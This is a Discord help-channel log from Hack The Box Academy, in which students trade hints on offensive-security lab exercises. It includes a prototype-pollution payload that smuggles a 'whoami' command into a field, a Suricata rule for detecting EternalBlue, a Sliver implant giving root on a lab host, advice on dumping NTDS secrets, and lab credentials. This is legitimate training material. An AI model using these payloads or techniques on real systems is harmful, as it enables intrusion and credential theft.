#modules

I forgot to write it down

is it previous one?

Yes... and rule #1... memo all credentials, always

I thought I did but I guess not

just use module search. You'll find it.

ok

but its in the same module no?

kira is not the name of the modlue

yes all the modules are independent of eachother

its the password attacks module I'm doing

so I don't quite understand

Same module, previous or same section... I'm fuzzy.

Been a couple weeks.

this section only has like one question

so I don't get how to solve this one

ok is anyone available tonight?

or like to DM?

what section are you on?

its usually* as simple as going through the previous sections and ctrl + f for "kira" in this case

Password Attacks Module and the section is Protected Files

I did this in a few previous sections its not showing up

hold on someone DMed me never mind

My recollection is that in the material provided, they showed you Kira's PW. You need to use that to get her id_rsa file... pretty straightforward.

So what ended up happening was I needed to comment out sock4 in config file since i ran socks5 in meterpreter, swear i did that hours ago and didnt work then but when i tried it again it worked afterwards lol

Bro, I'm still not getting it. I scanned for the right port and found a vulnerable service running (Apache 2.4.41) but there is no exploit for that

Pls how do I go about it now?

Check the website itself

BTDT

which is why I pointed out proxychains.conf update as well...

This worked, thanks a lot I'm so grateful.

Question tho, why was this the approach that worked and not trying to search for Apache vulnerability?

It's not directly in the module, you had to bruteforce it

I know I found it

never mind someone helped me get it

Same Empire error even happens in the web-based PwnBox hosted by HTB themselves.

Executing powershell-empire server
Traceback (most recent call last):
File "/usr/share/powershell-empire/empire.py", line 11, in <module>
import empire.server.server as server
File "/usr/share/powershell-empire/empire/server/server.py", line 14, in <module>
from empire.server.common import empire
File "/usr/share/powershell-empire/empire/server/common/empire.py", line 18, in <module>
from empire.server.core import hooks_internal
File "/usr/share/powershell-empire/empire/server/core/hooks_internal.py", line 5, in <module>
import jq as jq
ModuleNotFoundError: No module named 'jq'
┌─[root@htb-0klzeaiovo]─[~]

It lets you install jq, but then still gives the same error.... very frustrating. THIS is one tool that I loathe... it has never ever worked for about the eight years that I have tried to use it off and on...

tried that... that is starting it from the menu... you have to run as root.

Tried that...

Same thing on Kali

Exact same error

i remember not being able to get it to work so i just moved on

It's a part of the CME module in the CAPE path, so not a move-on thing. It's something that HTB should provide a work-around for.

You don't need it to complete the module or do anything. it's a c2.

you can post about it in #1234357888114364508

the cme part is just to uploadi/install i think, you can do the same with sliver for example

There is a section specifically on this ... and better to fix things than just move on... down the road I know I will need C2

yeah but it's a cme module, not a c2 module

it just showcases it i think, but like i said post in #1234357888114364508 to get it fixed

Sliver is for port-forwarding. Not C2.

no sliver is a c2

Okay... cool

Apache is the underlying Webserver, the website itself runs on top of Apache and implements much more user-faced logic. That also makes the website much more susceptible to exploits. Finding an exploit in Apache that gives you remote code execution would be a huuuge thing affecting a ton of websites.

Nice to know... never used it that way. Thanks for the direction...

It's in the CAPE path as well, so it'll teach you

Right... just seeing that. Always just used it as a port forwarder on a target.

I am sick and tired of Empire... every f (rea?)cking time! Never works!

you could try downloading it from the github and see if you can get it working there. like i said i gave up and just moved on because i hit the same brick wall. https://github.com/BC-SECURITY/Empire https://bc-security.gitbook.io/empire-wiki/quickstart

Did that... multiple times on everything... using their installation instructions.

Different module but same kind of error.

Debian, Kali, Parrot, Parrot-HTB version... nothing. I am doing what you did. Moving on. Reading Sliver C2 docs now to vent the frustration.

I know that sliver works because I use it all the time.

Hmm...I get it now. Thanks 🤝🏾

what else were you using it for? 😂

oh i see

is it allowed to share account with others to reduce cost for tier 3 modules?

No.

oke

You'll just end up not being able to work on the tasks anyway, as connections are limited to one per account.

..and Thor would not be pleased

https://tenor.com/view/thor-thor-infinity-war-gif-25139201

i hate thor, i love iron

https://tenor.com/view/dr-evil-mike-myers-austin-powers-right-gif-17640098

Hate is sucha strong word. But Ironman > Thor

I just started doing academy, what module does thor and ironman come in?

Fundamentals of AI

The getting started on Discord

Cracking into HTB Discord skill path

Okay

Anyone unlocked Tier 4 module , could you confirm Show solution is available like it is present in Tier 3 modules for Gold annual subscribers.

There is currently no annual subscription that includes Tier IV modules. Therefore no solutions are available.

Hello all,

I've been stuck on it for a few days now, on the Attacking Web Applications with Ffuf module, and on the Skills Assessment - Web Fuzzing chapter.
and on the question. Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?

I would like to know the list of words you used.

Hi there, I’m also stuck on the Attacking Web Applications with Ffuf module - skills assessment question 3

I clicked on the “show solution” button and the solution did not gave the correct output from the answer sheet

NoSQL Injection Skills Assessment II
Hi, I'm stuck on resetting the token, the script that I have can't generate a reset token in any way(
What am I doing wrong there?
Who managed to do this, maybe I'm missing something in my script?

The -mr flag is failing for me, I copied the exact command and I get a “dquote”

Did hackthebox really vet through their own solution?

*One of the pages you will identify should say 'You don't have access!'. What is the full page URL? *
hello!
Is that the question you mean?

Did you find the point of injection?

Yes sir! This is the question

I followed the solution step by step but it did not worked for me

I’m getting a “dquote” from the exact command provided by hackthebox

yes, this is the|| "username"|| field

I just did it like this:
||We change the port number to the word PORT.||
And the found address matched the answer.

Really? Then how come I’m getting a “dquote”?

If you know the field then just dump the token

Similar to what you’ve done in the ssji section

send me (pm) a screenshot, I'll take a look.

Hmm, it's a little different there.
I had to look into the tooltip and there's a completely different script.
he doesn't do anything (he gives out an empty value instead of a token)
, so he decided to find out how others were able to get the token.

I don’t know what you’re talking about

Okay 👍

I understood it so that we need:
1 - to generate a password reset token.
2 - The script should generate it for us.
3 - Then I apply it on the "reset" page
4 - and change the password for the user.
5 - Then I enter under it.
In the second step, I have a problem)

Did you find a valid username?

yeah

Yeah so you can see the difference in response size

Then you just dump the token with a payload similar to what you’ve done in the ssji

But you don’t need a this.username.match , this time you need this.token.match

Hello, everyone! I can't understand why is the minimal offset in this EternalBlue rule ||is 4.||
https://academy.hackthebox.com/module/226/section/2415

In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert?

I have found a solution in the internet ||and 4 is the correct answer,|| but I don't understand why because none of the payload seem to match the content string from 4th byte... and I couldn't really find anything that would match from 9th byte too.
Suricata rule: content:"|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 08 ff fe 00 08|"

I changed this rule's offset to 4 and got alerts on the following ports (I didn't get alerts before changing), yet when examining the logs in Wireshark they don't seem to match the content (???).

Am I looking at the wrong logs in Wireshark? Or looknig at the wrong place for the payload, have no idea. Please help me out

hello guys

i finished all the seccions of pivoting module and i am stuck at "socks and rdp tunneling"

the questing is "Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop. "

when i rdp to the pivot host and i ping the internal given ip i get destination is unreachable

any idea

Follow the steps in the section. You can't go from the target to the mentioned IP directly

They r both on same subnet I tried to ping it but there is no reply

And I already did the steps

hello guys, did any1 try connecting the ovpn of hackthebox using windows wsl? its not working for some reason

The spawned target and the IP in the question are not in the same subnet

I think there is some kind of configuration in WSL that has to be changed from default when using a VPN for DNS to work properly. I ended up having to disable my VPN anytime I used WSL.

The provided ip is connected to other NIC and that interface is 255.255.0.0

okay thanks ❤️

ah well didn't expect them to use a /16. Nonetheless the point still stands: the target can't talk to the IP so you have to go through another host first (as shown in the section)

Have you tried manually searching the bytes in wire shark to see where they match?

I have tried with data.data contains == value. Is there another filter for that?

I'm revisiting the Kerberos Attacks Module, anyone for a quick DM on the Unconstrained Delegation Section to check some of the commands in the exercise? I'm getting the auth but krbrelayx isn't extracting the TGT

I'm really impressed with the modules so far. I'm just doing stuff accessible from the student subscription and learning a lot that wasn't covered when I did GPEN

very good value getting this much info organized like this for $8/mo compared to the $9k SANS course

It could be any of the yellow packets in your wire shark screenshot, you will see that they all in the payload section start with 4 random bytes, then it has the common header of 0xFF followed by “SMB” in ascii. The next hex value is the command, in your rule you are looking for 0x33 which apparently is “SMB_COM_TRANSACTION2_SECONDARY”. I can see in your screenshot that you have a few of those in the yellow lines

What’s important with the offset is that you don’t count the tcp header in it, it’s the offset starting at the content section of the packet

It feels like I'm missing something basic here. I've looked for the matching hex values using 'find packet' and it finds matches, but they're not sequential and not in the begining (probably they follow the tcp header); also it matches only starting from 33 instead of ff

Hello, I need a hint for module Password attacks - skills assessment - level 2.
I am logged as Jason on the target, and see another user who holds an ssh key. I have run hydra for more than an hour with that username (and the [mutated] password list given as a resource), but without success. I now want to steal his ssh key for offline cracking, but I need to escalate Jason's privileges, and I don't see how to do it...

Ok you logged in as 'Jason', have you tried to enumerate services from inside the machine?

I see ftp and ssh services only

sorry ssh and smb (ftp was for level 1)

What about localhost services?

I don't recall needing to crack the second user password

I see a list of active services, but nothing obvious to me

It was just there

Well check those services, and whatever information you obtained so far that might have some further information about some services that can be useful.

I can share the notes I have on it if you'd like to try out what I've done to get it working. I was setting it up to see how it works with Netexec.

I'm not comfortable with local enumeration, so far I've always used remote enumeration with nmap. Can you send me to the appropriate module to upgrade my skills please?

You don't really need to stray too far, Look for information on whatever obtained content for another service which could be useful.

I'd go back to that document you have access to, read over it, then enumerate localhost services and see if what you can identify in that document is running locally.

I'm not done yet, but I've made progress thanks to your help, I've got a password for 2nd user 🙂

??

💪 Thank you !

Does someone know if the gold annual subscription you pay all the price at once, or you can pay it over time, over the year

The annual subscription is a one time payment

Hey, has anyone completed the final assessment on the advanced XSS and CSRF module? I feel I’m on the right track but have hit a road block and would love a nudge

The Suricata rule mixes hex and ascii values. The ff is hex, but the “smb” is ascii. Smb in hex is 53 4d 42, and if you check your screenshot that’s exactly what it shows, ff 53 4d 42 33 and so on

And you also see that there are 4 bytes before the ff, which is exactly the offset it was looking for. These 4 bytes are probably not deterministic and change with every request, but everything after stays the same for this specific attack

Hi, is there any support available here? I'm working on the LDAP Authentication Bypass challenge and managed to retrieve the flag HTB{...}, but the lab doesn't accept it as the correct answer. Here's the lab link: https://academy.hackthebox.com/module/204/section/2229.

Could someone help me figure out what's wrong?

Verify there aren't any leading or trailing spaces and if there aren't any, try to refresh the page and resubmit the flag.

AH. Thanks mate.

Is there going to be any Mobile Pentesting path ?

So far, HTB has not announced anything like this. Also, there are currently no modules that could indicate such a path.

So im kind of struggeling with the Whitebox attacks module on Remote Code Execution(https://academy.hackthebox.com/module/205/section/2343).

I have setup a localhost debugger and inspecting the Object values however sumitting my payload:

{"__proto__":{"deviceIP":"127.0.0.1; whoami"}} // Gets caugh in WAF

And

{"constructor.prototype":{"deviceIP":"127.0.0.1; whoami"}}

Bypasses the filter, however the object values just looks off to me, and i dont know if i am doing something wrong here:

{
  username: "test",
  id: 1,
  password: "a",
  deviceIP: "127.0.0.1",
  "constructor.prototype": {
    deviceIP: "127.0.0.1; whoami",
  },
}

The constructor.prototype gets stored as a object inside the User Object with its key and value pair.

i've never done prototype pollution before so i feel like i have 0 idea of what im trying to do

For some reason i cant rdp into windows box on the living off the land section in pentester pathway a black screen comes up then it goes off

Press enter

It’ll do magic

🤣

Never had it do that before

😄

@storm elk is this ok to post with my Q?

very basic nmap stuff i have a Q over

Just ask your question

you can only post content from tier 0 modules.. you also don't really need to post screen shots you can just ask the question and say which module/section you're on

ok so the dialog there says we do both an ARP and a ICMP ping using the -sn and -PE combo but im only seeing ARP in the output...

It can't draw the corporate AUP screen. It's an issue with xfreerdp, haven't seen it on remmina or rdesktop i don't think

the dialog suggests that forcing it with both switches is done to force both scans, but i only see the one

https://nmap.org/book/host-discovery-techniques.html#host-discovery-icmpping

-sn just disables port scanning

By default nmap does ARP scanning

i get that, but why are ICMP pings being forced but not returned in the output?

oh i guess i should just assume that in the output and not see teh ARP who/has as a red herring? or what?

maybe i need to traffic check in wireshark?

It could be that the icmp request is being dropped

¯_(ツ)_/¯

Could also just be arp came back so it didn't send icmp

ok

ill have to check in wireshark i guess to confirm

ty @fathom pendant i certainly appreciate your help on the reg.

Hello all! Is there anyone else having issues running the Windows VM on this module https://academy.hackthebox.com/module/87/section/885? Ive been able to install all tools, but when Im trying to install a linux distro I get this error:
Please enable the VIrtual Machine Platform Windows feature and ensure virtualization is enabled in the BIOS.
Ive got the Virtual Machine Platform Windows enabled and I tried enabling Virtualized AMD-V/RVI on VMWare but I get this error:
Virtualized AMD-V/RVI is not supported on this platform

Im a beginner, this is so hard to troubleshoot 😦
Ive followed these links without any success:
https://askubuntu.com/questions/1459065/virtual-machine-platform-windows-feature-and-virtualization-in-bios-is-enabled-b
https://www.reddit.com/r/vmware/comments/k7hd4z/virtualized_amdvrvi_is_not_supported_on_this/

Btw Im not completely sure if I just skip this part and keep going with the rest of the setting up section...

sounds like you're trying to do nested vm on your baremetal is that right? a vm within a vm?

that may not be supported by your distro/hardware/whatever

if you have ubuntu on baremetal and you have a windows vm that you're using for testnig, then make a separate vm for kali, within the same hyper visor, not a nested hyper-v in windows vm

Hello, I have a question based on the Introduction to Active Directory module.
I'm trying to setup my own DC and to modify some stuff. I'm currently working on my audit policy however I observe that the audit policy I setup from the Group Policy Management is not the same as what I have on my DC if I run auditpol /get /category:*.

It seems that the GPO is overwritted but I don't know by what...

Its just a VM on my windows machine. My PC is running Windows and the virtualization is enabled. Ive got the ParrotOS VM ready and its working like a charm, but the Windows VM is driving me crazy.

ok, yeah, could be the iso dunno. but if you know how it should work and you've done it before prob best to move on

You don't have to set up your own vm, also you'd need a windows server ISO to have it run as a DC iirc

gpresult from cmd line

gpresult /?

Well, Im a super noob. Ive worked as dev for some years but I never needed VMs and stuff, so Im taking the modules step by step so I dont mess anything up. Im following the Information Security Foundations path and this is the third module of that path. It also mentions the idea of paying for a VPS (I also have 0 experience using it). I dont know if Im in the right path for a noob and if it makes sense to setup the windows vm or the VPS when I have 0 knowledge about any other cybersecurity concept

vm better if you have a machine that can run a vm

no dont look into that too much, you just need to... you're running hyper-v or vmware/

You don't need a vps

Ive got a ParrotOS VM already up and running. Maybe I should jump directly to the next module (Linux Fundamentals) then?

Im running vmware

Does vmware give you type-1 and type-2 vms?

BIOS/UEFI? that might be the prob

just off top of my head

its really not worth digging into if you want to move on with the content (unless you're deadset hung up on resolving it, but itssomething config related, guaranteed) if your parrot vm works you're good to go, figure out the windows stuff later

vmware offers both. vmware workstation is a type 2, which i'm guessing most people are using.

this might be the prob i have only used vbox for some time now so i dont run into the issue but i certainly run into bios/uefi issues on vm from time to time

In the MSSQL, Exchange & SCCM attacks - Introduction to Privilege Escalation on MSSQL - when enumerating the webshop users & roles, it indicates that there is another db_owner - this is equal to NULL
"the name is left empty since our user does not have access to this information."

It then goes on to say "we discovered our login (ws_dev) can impersonate ws_user" - the previous screenshot only shows db_owner:NULL, how are we inferring / determining that ws_user has the db_owner role?

i just scrolled up and read the issue, sounds to me like his hardware doesn't support virtualization

for AMD it's called AMD-V and Intel it's called Intel-VT-x

Attacking Web Applications with Ffuf Module's Skill Assessment Question 3 seems broken, even if i submit the correct answer it is showing as incorrect.

did you read the hint to format it properly

got it now

my bad should have seen it

now you're firing on all cylinders! 😛

lol

You can impersonate and then enumerate again, that should show the role this time around

my ass needs to do the skills assements for each module again

story of my life

the funny thing is i didnt take notes on them

so even i dont remember how I solved them

ah ty

hey everyone,

i am doing skills assessment for crackmapexec module and i got stuck after getting the user N**** creds. i know i can access the share on dc ,but not able to download anything due to insufficient permission. i must be missing a step. any nudges please?;D

You should be able to download the ccache file

funny it says permission denied

Are you able to write in the folder on your drive?

yes

Mb you don’t have permission to dl because you can’t write? lol

lol

nick account right?

yeap

after HOURS. now worked....

thanks man! for some reaso now it worked

Has anyone done 'heal' on htb?

Check the #welcome channel to verify your account and get access to the #1317551396920229958 and #boxes channels

Hey guys Im Adrian

I have a problem with my silver

`sliver (FRIENDLY_GRAMMAR) > shell

? This action is bad OPSEC, are you an adult? Yes

[] Wait approximately 10 seconds after exit, and press <enter> to continue
[] Opening shell tunnel (EOF to exit) ...

bash -p
id
/bin/bash
export TERM=xterm
ls
ls
id

`

I created a implat poiting to my host then I got a back connection but when I tried to create a interactive shell session it seems like the is stuck

sliver (FRIENDLY_GRAMMAR) > sessions

ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ================== =========== ====================== ========== ========== ================== ======== ======================================= =========
57bf091d FRIENDLY_GRAMMAR http(s) 10.129.229.147:45184 dmz01 root linux/amd64 en-US Sat Dec 21 21:31:30 PST 2024 (1s ago) [ALIVE]

sliver (FRIENDLY_GRAMMAR) >

sliver (FRIENDLY_GRAMMAR) > use

? Select a session or beacon: SESSION 57bf091d FRIENDLY_GRAMMAR 10.129.229.147:45184 dmz01 root linux/amd64
[*] Active session FRIENDLY_GRAMMAR (57bf091d-5553-4207-8e34-1b80ee632b29)

sliver (FRIENDLY_GRAMMAR) > shell

? This action is bad OPSEC, are you an adult? Yes

[] Wait approximately 10 seconds after exit, and press <enter> to continue
[] Opening shell tunnel (EOF to exit) ...

hey

I need help

What is the API key in the hidden admin directory that you have discovered on the target system? def For_Future_Generation_of_Hackers(): print("Just follow the instruction. There is nothing like Enumeration. Hint: vhost, gobuster and dns. Once you guys found something, Start Enumeration again, Happy Hacking, Over and Out, TheUnknownPirate.") For_Future_Generation_of_Hackers()

hey,

any hint to get the last flag for crackmapexec skills assessment?

If you got the ccache and know how to use it you are basically done. The user is pretty powerful

it does not run any command on dc tho

It can dump secrets tho

hm.. ntds...

Hey guys, i'm trying to do the python3 module but when i want to run my script i alwyas receive this error (from my own box and from the htb instance) cane someone help? I already tried to install uninstall BeautifulSoup it gives me an error and says the "new" one is beautifulsoup4, and this modul is already installed

thanks

uhmm,i couldnt find netcat package on chocolatey,what should i do?

get it off github or use linux

what module?

i'm new i'm doing setting up rn

oh yeah, then im not sure

but i highly suggest using your own linux vm or pwnbox for the academy, they have the tools pre-installed for you already

like...it has npcap and nmap ,so i dont know which one to install

i have a laptop for my kali linux,i'm just trying to setup for my window laptop

if youre setting up a windows vm, you don't really have to worry about it

for now, a linux vm will be sufficient

thanks u guys,i will try on VM

Hi I need a hint on skills assessment part 2 for Attacking Active Directory module. I am on this question : "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. ".

So far I have obtained a foothold in the domain, got a domain user and used that user to enumerate a list of users, groups, obtain bloodhound data. Also I have tried password spraying. Also searched for scripts in sysvol and gpos.

Use the passwords used in the example

Hi everyone! Anyone up for a quick brainstorming session on the "Injection" skill assessment? Feeling a bit stuck and could use some ideas

Rubber ducky based off of what you learned in the module, you might need to combo techniques

I’ve made some progress and managed to get the internal IP, but now I’m stuck. It would be great to chat.

Well I'm not available to chat

in the example? ok i go back thru the modules

Got it, thanks! I don’t want to disclose too much here, but if anyone’s available, I’d love to brainstorm about this.

Also contemplating making DMs paid depending 🤔 but I'd need access to my computer before committing

sorry this was to me right?

Yes

OK. GL.

ok spraying with one of the passwords i found in one of the module sections. thank you for the hint

damn kerbrute is fast

hmmm i tried two of the passwords used in the password spraying section, didn't get any hits against the user list i got by enumerating the domain users through ldap

still no hits?

no but maybe my user list is not good or something. I just checked the solution and it should have worked

I'm an idiot. I wasn't using the right file for the user list. I have two files named very similarly. user.list and user.lst. I needed to use user.lst

but now the instance died 🙂

time to start again

it's why kerbrute was coming back so quickly i guess

unblocked thank you for the hint

Probably the hardest module Ihv completed so far

The skill assesment was incredible

waiting for admin

I have done the identify. But requires admin for support.

Has anyone done heal though

This channel is for Academy. Identifying doesn't require admin.

hmm Vultr charge me 17.5$/month. Does it normal?

It does for me ....

it's fully automated... do you have your account identifier?

do u guys have any options for VPS?

you don't need to get a VPS

I m using this as a POST request

Does anyone knows why this is not working?

are you sure it's vulnerable?

This worked

and i do get the base64 sourcecode!!

ok those are two totally different php wrappers

the expect wrapper isn't enabled by default, how do you know it's vulnerable?

allow_url_include?

That shd be enabled? for this to work?

or is there any other way we can do it?

do what?

In file inclusion module it was told that to use except wrapper, allow_url_include shd be enabled

To know if expect wrapper is enabled?

that module has a lot of sections, still not sure what you're trying to do.

Remote Code Execution with XXE

Web Attacks >Local File Disclosure

do you mean the web attacks module?

yes!!

I m able to read source code using filter wrapper

pretty sure you need to do it like the module shows using a dtd not just executing commands directly

The other way also uses except

ok, did you try it?

I got our point!!

The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work.

I m sorry for wasting your time!!

you're not

but there's more to it

read the remote code execution with xxe section again

it says it you can't see the output you may need to execute the command in a more complicated way

I did try the other method as well though

i would check all your stuff is setup correctly then

sudo python3 -m http.server 81
Serving HTTP on 0.0.0.0 port 81 (http://0.0.0.0:81/) ...

no request came on my python server

just wanted to know If you are aware that in the exercise, can we use expect wrapper? Is it enabled if you ahve some insight?

worked when i did it

double check your stuff

if you're going to embed a variable you should wrap it with {} ie ${VAR}

If you add http://...:81, you don't get the request in your sv either?

may just not be vulnerable

nope

└─# sudo python3 -m http.server 81
Serving HTTP on 0.0.0.0 port 81 (http://0.0.0.0:81/) ...

for that i think i nees to byapss { and } as well, but there isnt any variable i suppose

whay do you mean?

llike...i saw in the setting up module we regist a VPS

may just not be vulnerable.

You said it worked for you!!

then i went and looked at the actual challenge, it wants you to read a file not rce

Could this go to DMs?

Tier 2 module..

ty

you don't HAVE to; i've not once used and/or needed a VPS for academy

thank you alot

I am on the footprinting hard and found ||mysql|| user with cat /etc/passwd after ssh'ing into the target as ||tom||. I then used
||cat /etc/mysql/mysql.conf.d/mysqld.cnf || to get the config for the service but it only lists the user and bind-address. I've searched for hints in this chat and saw that people were able to login to ||mysql|| but I am not sure what I am missing since I haven't been able to with default or empty passwords. A tip would be appreciated

have you tried the creds you found already?

Does anyone know how to get a girlfriend in 2025?

that's not a module topic

ty ty, I thought I did but I just tried again and it worked

girls think htb certs are hot

get CAPE

Sorry, no spoilers for Tier 7 Modules

https://tenor.com/view/batman-real-true-fact-checked-fact-gif-6343207587503842551

Certified Boyfriend Brings Happiness

you heard it here first, g0blin just leaked the next HTB path

Hah oh no

I'm doing the Skills Assessment - Windows Fundamentals and can't figure out the answer to || "What is the name of the service associated with Windows Update?" || I am thinking that maybe prior knowledge is messing with me, because none of the answers I can find are the right one. If I could discuss it, I'd appreciate it

NM, reloading my webpage fixed it...

the answer is in your question 😅

Is there a way to export/copy a list of payloads either by manual selection or filters (based on status code, length, etc) directly to a wordlist?

I bruteforced the password using pwnbox and I got the flag

Hi, i've got a question in regard to Advanced SQL injection SA2 - i'm stuck at the last part, but what's funny is that I have gold annual subscription and there is a walkthrough that seems logical but the code does not work 🤣 there is no indication in the walkthrough that there should be some adjustments to the code (which I tried to tweek regardless to make it work but failed). Could somebody help or should i "speak to the manager" or some help center as it seems to be the case of wrong information on the site...?

The admin uses a firewall that prevents you from exfiltrating the cookie directly.

it is not about the cookie

If you suspect an issue with the walkthrough #1234357888114364508 ; utilize ||spoiler markdown || if you need to copy/paste from the walkthrough

Have you installed the correct version of PostgreSQL Server?

pelase help

Read the hint
The admin uses a firewall that prevents you from exfiltrating the cookie directly

shoulde I try with dns rebinding ?

No, you're already on the right track. Your payload works when an error occurs. Does an error really occur? Can alert work?

yes alll works bu there is no cookie

try using an image URL that certainly does not exist. Then onerror will surely be executed.

not worked

send me a dm.
I'll delete the pictures here. They contain spoler

hey gys i'm stuck on this since several days anyone now the issue?

I've installed postgress with sudo apt install postgresql-server-dev-all as sudo apt install postgresql-server-dev-13 is not found (unable to locate package, even after apt update) and couldn't find the other workaround in google

but the problem seems to be at earlier steps, e.g. SQLi not working

(im doing it on PwnBox)

Rename your script to something else

already did it

if you get the same/similar error then you've used another name that's used during an import

I tought to but i litterly cp the scirpt from the module

i'm gonna try in the evening i'm trying mastering python rn

The script contents are alright, you just can't name the file html.py

Hi there, I am stuck at the exercise in Authentication Bypass via Direct Access in Broken Authentication module. Can anyone please help me?

ow okej i'm gonna try it thanks

is it a spcial file nom or? Why is in not working with this name any idea?

Likely there is an import importing html, and when you have that file name, it will chose that file instead of the library/external source that you actually want

^ this, you can see it towards the end of the error message.
It’s trying to import html.entities from your file and there you have import bs4 in there. You’ll end up in an endless loop.
You can lookup the import search order

also, when i finally managed to install postgresql-server-dev version 13, then the package does not compile at all - fatal error, #include "postgres.h" no such file or directory

hello there i was trying to solve a question from introduction to windows command line modue where question is (SSH to 10.129.255.206 (ACADEMY-ICL-WIN11) with user "htb-student" and password "HTB_@cademy_stdnt!" ) Access the target host and run the 'hostname' command. What is the hostname? i tried ||*~~raja@Raja:/mnt/c/Users/rajak$ ping 10.129.255.206 PING 10.129.255.206 (10.129.255.206) 56(84) bytes of data. 64 bytes from 10.129.255.206: icmp_seq=1 ttl=127 time=225 ms 64 bytes from 10.129.255.206: icmp_seq=2 ttl=127 time=221 ms ^C --- 10.129.255.206 ping statistics --- 3 packets transmitted, 2 received, 33.3333% packet loss, time 2001ms rtt min/avg/max/mdev = 221.329/223.131/224.934/1.802 ms~~*||

***||raja@Raja:/mnt/c/Users/rajak$ nmap -p 22 10.129.255.206
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-22 12:10 UTC
Nmap scan report for 10.129.255.206
Host is up (0.23s latency).

PORT STATE SERVICE
22/tcp open ssh

Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds||***
raja@Raja:/mnt/c/Users/rajak$ ssh htb-student@10.129.255.206
Connection reset by 10.129.255.206 port 22 did anyone face the same issue ?

It looks to me as if some components are not installed correctly

could I send you a DM?

sure

Hi, can we make suggestions about modules?

/feedback

thanks

its about using ligolo-ng on Pivoting, Tunneling, and Port Forwarding module

pretty sure there's already a module that covers that

its starts with tier 3 modules, but having on pivoting helps a lot with cpts cert

hi, i'm working on skill assessment 2 on Attacking AD. I have arrived at the question:
"Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host"

So far I have used mssqlclient.py to connect to the SQL01 host and ran a few commands to enumerate the directories, logins etc.

My thoughts are i should be able to run a cmd shell to then exfiltrate registry hives?

oh i have also tried using evil-winrm to try creds i have already. no luck

Should have been able to enumerate that local group and tune your attack.

Try making the extension in the early section of the Module

i've taken a sneak peek at the windows priv esc module and using the juicy potato technique in there

or trying to.... so far not working

Try another one, there was one that said Printer Spoofer

ok will take a look thx

<@&861185840277487616>

I am working on HackTheBox Academy and currently connect to a provided machine via SSH to perform attacks. I would like to pivot the entire network of this machine into my own system, so I can run tools such as NTLMRelayX and PetitPotam directly from my machine and access the Domain Controller (DC).

I have tried using LigoLo and other tools but have not been successful. Any guidance on achieving this would be greatly appreciated.

Did you try normal ligolo or ligolo-ng?

hey guys, Im currently working on the Windows Lateral Movement skills assesment and am having trouble with question 2. I got the credentials for Arturo and RDP into the machine with the necessay port but no flag on the desktop. I know I need to access wsus but am having trouble doing so. Would appreciate a nudge on this one

The text file you found talks about default ports and mentions a specific service, try that one

Hello guys nice to meet you all

I’m really passionate to learn hacking but i have no idea about this …… i’ve something before about networks our something like that so i use iPhone 8 and looking for a way to learn it by my phone and also i have a PC

So any advices ?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hacking via phone is 10x harder. Not to mention it would require jailbreaking it

Also your eyes won’t like it

Hi there i am starting to learn hacker in my university's study group and I won a 1 month license to HTB Enterprise in this end year so I want to spend the most time I can Learning but from what i've seen it is more usefull for advance learners, since they usually recommend HTB Academy for starting out, I wonder if anyone wants to learn side by side along me, :b, and also may I ask what could i do If having a machien started and conneccted to the VPn it stills seems to not respond at all. Thank you very much. I do not know if it is the proper channel to ask or is it #1024429874246590575 where i also asked. Thank you all.

ligolo-ng where We get one proxy and agent

Can anyone assist with 'Print Operators' modules for Windows PrivEsc? I don't understand how to utilize this UACMe's akagi64.exe in this lab. I've run the suggested keys from the github page and either nothing happens or I get a UAC prompt for creds. Any guides available for this?

I don't recall the section ever talking about akagi64.exe, does it say to use that?

It's pretty light on details. "The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line. "

I don’t think Ntlmrelay will work since it needs to connect back to you

the repo shows akagi from run examples

it walks you through some things.. have you tried those?

it walks you through the capcom driver, then shows you auomated eoploaddriver

I ran into an an error on eoploaddriver, figured without the uac bypass I am going to get nowhere.

I'll try skipping the UACme stuff and seeing where I get.

yeah this doesn't require anything outside of the material

Will other tools work? Expect ntlm relay and is there any way to make it work

only tools that dont need inbound connections, unless you portforward

petitpotam only sends a connection so that will work

Okay Yea that worked with dynamic port forwarding but ntlmrelay didnt. With portforward how can i?

Thanks for clearing up my question.

ntlmrelyx uses a lot of ports, so i suggest you just use it on the attack box

Okay, Thanks A lot

hey, I'm new to HTB and currently doing the IS foundations path, but i was wondering, they now announced the new module introduction to IS security, which is not in that path, which would be more useful to do first, the path or the module?

I'd do the path first

this doesn't look like an HTB academy module

Enterprise is only for businesses so you might not find a lot of people that have the same kind of access you do. Enterprise has access to some prolabs and Sherlock’s that normal users don’t have, so if you want to make the most out of it you’d do those. Do you have to activate it now or can you use it at a later time?

it looks potentially like that interface is EP; but that doesn't look like an academy lab; hence why i said something

:)

It says EU VIP+ on the screenshot. Isn’t that main platform?

yep

VIP isn't academy

Activated fow now

yeah. Marcie is right

As always

i'd say reach out to support if you're facing connection issues

Sure u.u. It is just that you know I started on thsi world like a month ago and getting this huge reward , well i do not know so much about it but im trying to get the best out of it

https://tenor.com/view/okay-now-pay-me-adam-engvid-give-me-proper-compensation-give-me-my-salary-gif-946395665007702388

I eneded up solving it with the FTP cconnection recommended in the help page. Thank you all

Do you accept cubes?

https://tenor.com/view/simpsons-money-peanuts-explain-how-homer-gif-15536016

I do

im still having trouble accessing wsus server on Windows Lateral movement skills assesment question 2. Anyone have a hint?

Anyone can help with Privesc in Windows? Defender and amsi giving me a headache. If so, plz dm

in the WIndows Privesc module? i don't recall many issues with defender and amsi

Nope outside of htb platform

well then it sounds like it's either illegal or part of a ctf in which case outside help is cheating

but since it's not relevant to HTB academy, doesn't belong in this chat

Sounds good

It's neither but that's ok

read and follow #welcome to gain access to more channels

